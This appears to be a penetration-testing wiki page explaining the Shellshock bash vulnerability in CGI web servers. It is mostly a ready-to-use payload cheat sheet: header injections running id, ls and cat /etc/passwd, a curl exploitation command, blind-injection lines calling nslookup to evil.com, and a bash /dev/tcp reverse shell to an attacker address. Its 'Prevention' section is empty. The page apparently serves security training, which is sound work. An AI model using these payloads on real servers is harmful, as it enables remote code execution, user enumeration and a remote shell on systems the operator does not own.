Shellshock
What is it?
Shellshock is a software configuration flaw within how bash handled functions being defined within environment variables (Request Headers) and exported them. Web Servers that utilized /bin/sh on the back end, utilized CGI scripts, or used popen() or system() functions are vulnerable to this exploit. (@lcamtuf) The alternative use is to use /bin/dash which does not have the vulnerability.
An example is a site (e.g http://test.com/serverstats.cgi) that runs a /bin/bash script. By looking at the site's source performs a simple GET requests that runs the a script but since its using /bin/bash, by modifying the User Agent, Referer, or Cookie headers we can get RCE on server side.
Use
echo
for padding as servers can return a 500 error if not used.
HTTP_USER_AGENT='() { :;};echo;/usr/bin/id'
# HTTP_USER_AGENT' is CGI Environment Variable, rest is the shellshock injection
# () { :;} is the Shellshock Prefix. Indicates variable is a BASH function. : means do nothing on BASH.
# ;echo is padding. When injecting into HTTP Headers prepending the command with an echo can help avoid server errors.
# ;/usr/bin/id is the command that will be executed. Ping or nslookup could be used for blind injections.
Exploiting
You can use Curl command or Burp Repeater for fast modifications
Burp

Curl
curl -A "() { :;};echo;/bin/ls -la /" http://$IP/test
Cheat Sheet
Shellshock Inject Payloads
() { :;};echo;/bin/ls -la / # View files on root directory
() { :;};echo;/usr/bin/id # See user running server
() { :;};echo;/bin/cat /etc/passwd # Enumerate users
Blind Shellsheck Injection
() { :;};echo; ping -c 4 <YourIP>
() { :;};echo; nslookup abc123.evil.com
Reverse Shell Payload
() { :;};echo;/bin/bash -i > /dev/tcp/<YourIP>/9000 0<&1 2>&1
Display Kernel Version
() { :;};echo;/bin/uname -a
Prevention
References
[Ref1] : Sec542 course demo https://www.sans.org/course/web-app-penetration-testing-ethical-hacking
Picture: https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/
Last updated
Was this helpful?